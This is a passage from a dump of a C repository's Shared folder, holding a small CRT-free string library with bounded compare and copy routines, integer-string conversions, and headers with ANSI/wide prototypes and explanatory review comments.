   characters; 0 when equal within the limit (or same pointer, both NULL,
   or cchars == 0), -1 for a NULL s1, 1 for a NULL s2, otherwise the
   difference of the first differing characters. */
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    while (cchars > 0) {
        c1 = *s1++;
        c2 = *s2++;
        cchars--;
        /* stop at the end of s1 or at the first mismatch */
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
56 |
--------------------------------------------------------------------------------
/Shared/_strncmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Case-insensitive _strncmp_a: compares at most cchars bytes after folding
   ASCII 'A'..'Z' with locase_a. Same NULL/limit handling and return
   convention as _strncmp_a. */
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
    char c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    while (cchars > 0) {
        c1 = locase_a(*s1++);
        c2 = locase_a(*s2++);
        cchars--;
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
29 |
/* Case-insensitive _strncmp_w: compares at most cchars characters after
   folding ASCII 'A'..'Z' with locase_w. Same NULL/limit handling and
   return convention as _strncmp_w. */
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    while (cchars > 0) {
        c1 = locase_w(*s1++);
        c2 = locase_w(*s2++);
        cchars--;
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
56 |
--------------------------------------------------------------------------------
/Shared/_strncpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Bounded copy: copies up to min(ccdest - 1, ccsrc) bytes of src into dest
   and always NUL-terminates (ccdest is the size of dest in chars including
   the terminator). Returns dest; dest is untouched when either pointer is
   NULL or ccdest is 0. Unlike the CRT strncpy there is no zero padding. */
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
{
    char *out = dest;
    size_t room;

    if ((dest == 0) || (src == 0) || (ccdest == 0))
        return dest;

    /* one slot is reserved for the terminator */
    room = ccdest - 1;
    while ((room > 0) && (ccsrc > 0) && (*src != 0)) {
        *out++ = *src++;
        room--;
        ccsrc--;
    }

    *out = 0;
    return dest;
}
24 |
/* Wide-character counterpart of _strncpy_a: copies up to
   min(ccdest - 1, ccsrc) characters and always NUL-terminates (ccdest
   counts the terminator). Returns dest; untouched when either pointer is
   NULL or ccdest is 0. No zero padding. */
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
{
    wchar_t *out = dest;
    size_t room;

    if ((dest == 0) || (src == 0) || (ccdest == 0))
        return dest;

    /* one slot is reserved for the terminator */
    room = ccdest - 1;
    while ((room > 0) && (ccsrc > 0) && (*src != 0)) {
        *out++ = *src++;
        room--;
        ccsrc--;
    }

    *out = 0;
    return dest;
}
46 |
--------------------------------------------------------------------------------
/Shared/minirtl.h:
--------------------------------------------------------------------------------
1 | /*
2 | Module name:
3 | minirtl.h
4 |
5 | Description:
6 | header for string handling and conversion routines
7 |
8 | Date:
9 | 1 Mar 2015
10 | */
11 |
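#ifndef _MINIRTL_
#define _MINIRTL_

/* Prototypes for the CRT-free string helpers in Shared/*.c. Each routine
   exists in an ANSI (_a, char) and a wide (_w, wchar_t) flavour; the
   generic names at the bottom pick one according to the UNICODE macro.
   Conventions shared by the implementations shown in Shared/: NULL inputs
   are tolerated (copy/concat return dest unchanged, length/end return 0,
   compares sort a NULL s1 first); only the _strncpy_* family checks
   bounds, and there ccdest counts the terminator.
   NOTE(review): the guard _MINIRTL_ and the leading-underscore names are
   in the identifier space reserved for the implementation. The generic
   macros below also redefine the C library name strtoul, so this header
   must not be mixed with <stdlib.h> in the same translation unit. */

// string copy/concat/length

char *_strend_a(const char *s);                 // pointer to the terminating NUL
wchar_t *_strend_w(const wchar_t *s);

char *_strcpy_a(char *dest, const char *src);   // returns dest
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);

// NB: _strcat_* return the NEW end of dest (its terminator), not dest
char *_strcat_a(char *dest, const char *src);
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);

// ccdest: size of dest in chars incl. terminator; ccsrc: max chars taken from src
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);

size_t _strlen_a(const char *s);
size_t _strlen_w(const wchar_t *s);

// comparing

int _strcmp_a(const char *s1, const char *s2);
int _strcmp_w(const wchar_t *s1, const wchar_t *s2);

int _strncmp_a(const char *s1, const char *s2, size_t cchars);
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);

// the *i variants fold ASCII 'A'..'Z' only (locase_* in rtltypes.h)
int _strcmpi_a(const char *s1, const char *s2);
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);

int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);

char *_strstr_a(const char *s, const char *sub_s);
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);

char *_strstri_a(const char *s, const char *sub_s);
wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);

// conversion of integer types to string, returning string length
// (ultostr_*: pass s == 0 to obtain the length without writing anything)

size_t ultostr_a(unsigned long x, char *s);
size_t ultostr_w(unsigned long x, wchar_t *s);

size_t ultohex_a(unsigned long x, char *s);
size_t ultohex_w(unsigned long x, wchar_t *s);

size_t itostr_a(int x, char *s);
size_t itostr_w(int x, wchar_t *s);

size_t i64tostr_a(signed long long x, char *s);
size_t i64tostr_w(signed long long x, wchar_t *s);

size_t u64tostr_a(unsigned long long x, char *s);
size_t u64tostr_w(unsigned long long x, wchar_t *s);

size_t u64tohex_a(unsigned long long x, char *s);
size_t u64tohex_w(unsigned long long x, wchar_t *s);

// string to integers conversion
// (strtoul_*: leading decimal digits only, no sign, no overflow detection)

unsigned long strtoul_a(char *s);
unsigned long strtoul_w(wchar_t *s);

unsigned long long strtou64_a(char *s);
unsigned long long strtou64_w(wchar_t *s);

unsigned long hextoul_a(char *s);
unsigned long hextoul_w(wchar_t *s);

int strtoi_a(char *s);
int strtoi_w(wchar_t *s);

signed long long strtoi64_a(char *s);
signed long long strtoi64_w(wchar_t *s);

unsigned long long hextou64_a(char *s);
unsigned long long hextou64_w(wchar_t *s);

/* =================================== */

#ifdef UNICODE

#define _strend _strend_w
#define _strcpy _strcpy_w
#define _strcat _strcat_w
#define _strlen _strlen_w
#define _strncpy _strncpy_w

#define _strcmp _strcmp_w
#define _strncmp _strncmp_w
#define _strcmpi _strcmpi_w
#define _strncmpi _strncmpi_w
#define _strstr _strstr_w
#define _strstri _strstri_w

#define ultostr ultostr_w
#define ultohex ultohex_w
#define itostr itostr_w
#define i64tostr i64tostr_w
#define u64tostr u64tostr_w
#define u64tohex u64tohex_w

#define strtoul strtoul_w
#define hextoul hextoul_w
#define strtoi strtoi_w
#define strtoi64 strtoi64_w
#define strtou64 strtou64_w
#define hextou64 hextou64_w

#else // ANSI

#define _strend _strend_a
#define _strcpy _strcpy_a
#define _strcat _strcat_a
#define _strlen _strlen_a
#define _strncpy _strncpy_a

#define _strcmp _strcmp_a
#define _strncmp _strncmp_a
#define _strcmpi _strcmpi_a
#define _strncmpi _strncmpi_a
#define _strstr _strstr_a
#define _strstri _strstri_a

#define ultostr ultostr_a
#define ultohex ultohex_a
#define itostr itostr_a
#define i64tostr i64tostr_a
#define u64tostr u64tostr_a
#define u64tohex u64tohex_a

#define strtoul strtoul_a
#define hextoul hextoul_a
#define strtoi strtoi_a
#define strtoi64 strtoi64_a
#define strtou64 strtou64_a
#define hextou64 hextou64_a

#endif

#endif /* _MINIRTL_ */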
156 |
--------------------------------------------------------------------------------
/Shared/rtltypes.h:
--------------------------------------------------------------------------------
/* Minimal stand-ins for the <stddef.h> types so the Shared routines build
   without the CRT. The guard macros are the same ones the MSVC CRT headers
   set, so including both in one translation unit does not double-define.
   NOTE(review): these definitions are Windows/MSVC specific (16-bit
   wchar_t, __int64, __w64) and are not portable to other toolchains. */
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif /* _WCHAR_T_DEFINED */

#ifndef _SIZE_T_DEFINED
#ifdef _WIN64
typedef unsigned __int64 size_t;
#else /* _WIN64 */
typedef __w64 unsigned int size_t;
#endif /* _WIN64 */
#define _SIZE_T_DEFINED
#endif /* _SIZE_T_DEFINED */
14 |
/* ASCII-only lower-casing: maps 'A'..'Z' to 'a'..'z' and returns every
   other byte unchanged (non-ASCII letters are not folded). */
__forceinline char locase_a(char c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (char)(c + 0x20) : c;
}
22 |
/* Wide-character counterpart of locase_a: folds ASCII 'A'..'Z' only;
   every other code unit is returned unchanged. */
__forceinline wchar_t locase_w(wchar_t c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (wchar_t)(c + 0x20) : c;
}
30 |
/* Absolute value of a char. NOTE(review): for the most negative char the
   negation does not fit in char and the result of the narrowing
   conversion is implementation-defined - callers should not rely on it. */
__forceinline char byteabs(char x) {
    return (x < 0) ? (char)(-x) : x;
}
36 |
/* 1 when x is an ASCII decimal digit '0'..'9', else 0. Locale-independent. */
__forceinline int _isdigit_a(char x) {
    return (x >= '0') ? (x <= '9') : 0;
}
40 |
/* 1 when x is an ASCII decimal digit L'0'..L'9', else 0. Other Unicode
   digit ranges are not recognised. */
__forceinline int _isdigit_w(wchar_t x) {
    return (x >= L'0') ? (x <= L'9') : 0;
}
44 |
--------------------------------------------------------------------------------
/Shared/strtoul.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
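/* Parse the leading run of ASCII decimal digits in s into an unsigned long.
   Parsing stops at the first non-digit; no sign, whitespace or radix prefix
   is accepted, and a NULL s yields 0. Overflow is not detected: the value
   simply wraps (unsigned arithmetic), so callers that need a bounded value
   must range-check the result themselves. */
unsigned long strtoul_a(char *s)
{
    unsigned long value = 0;

    if (s == 0)
        return 0;

    /* _isdigit_a, not _isdigit_w: s is a narrow string (the wide helper
       is for strtoul_w). */
    while ((*s != 0) && _isdigit_a(*s)) {
        value = (value * 10) + (unsigned long)(*s - '0');
        s++;
    }
    return value;
}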
21 |
/* Wide-character counterpart of strtoul_a: parses the leading run of
   ASCII digits L'0'..L'9', stops at the first non-digit, returns 0 for a
   NULL s. No sign or prefix handling and no overflow detection (wraps). */
unsigned long strtoul_w(wchar_t *s)
{
    unsigned long value = 0;
    wchar_t ch;

    if (s == 0)
        return 0;

    for (;;) {
        ch = *s;
        if ((ch == 0) || !_isdigit_w(ch))
            break;
        value = (value * 10) + (ch - L'0');
        s++;
    }
    return value;
}
40 |
--------------------------------------------------------------------------------
/Shared/ultostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Write the decimal representation of x into s (NUL-terminated) and return
   the number of digits written. With s == 0 nothing is written and only
   the digit count is returned, so a caller can size a buffer first; s must
   have room for that count plus the terminator. */
size_t ultostr_a(unsigned long x, char *s)
{
    size_t digits = 1;
    unsigned long probe;
    char *p;

    /* digit count: one more for every time x can still be divided by 10 */
    for (probe = x; probe >= 10; probe /= 10)
        digits++;

    if (s == 0)
        return digits;

    /* emit the least significant digit first, filling from the right */
    p = s + digits;
    *p = (char)0;
    while (p != s) {
        p--;
        *p = (char)(x % 10) + '0';
        x /= 10;
    }
    return digits;
}
24 |
/* Wide-character counterpart of ultostr_a: writes the decimal digits of x
   into s (NUL-terminated) and returns the digit count; with s == 0 only
   the count is returned. s must hold count + 1 characters. */
size_t ultostr_w(unsigned long x, wchar_t *s)
{
    size_t digits = 1;
    unsigned long probe;
    wchar_t *p;

    /* digit count: one more for every time x can still be divided by 10 */
    for (probe = x; probe >= 10; probe /= 10)
        digits++;

    if (s == 0)
        return digits;

    /* emit the least significant digit first, filling from the right */
    p = s + digits;
    *p = (wchar_t)0;
    while (p != s) {
        p--;
        *p = (wchar_t)(x % 10) + L'0';
        x /= 10;
    }
    return digits;
}
46 |
--------------------------------------------------------------------------------